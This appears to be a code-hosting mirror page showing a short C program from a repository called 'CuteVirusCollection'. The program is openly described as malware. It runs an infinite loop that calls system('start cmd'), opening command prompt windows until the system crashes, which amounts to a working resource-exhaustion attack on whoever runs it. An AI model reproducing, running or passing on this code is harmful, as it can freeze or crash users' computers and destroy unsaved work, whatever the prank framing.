mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-22 23:26:26 -08:00
14 lines
212 B
C
14 lines
212 B
C
/**
|
|
* Developer: Minhas Kamal
|
|
* Functionality: Opens an infinite number of command prompt
|
|
* window till the system crushes.
|
|
**/
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
while(1){
|
|
system("start cmd");
|
|
}
|
|
}
|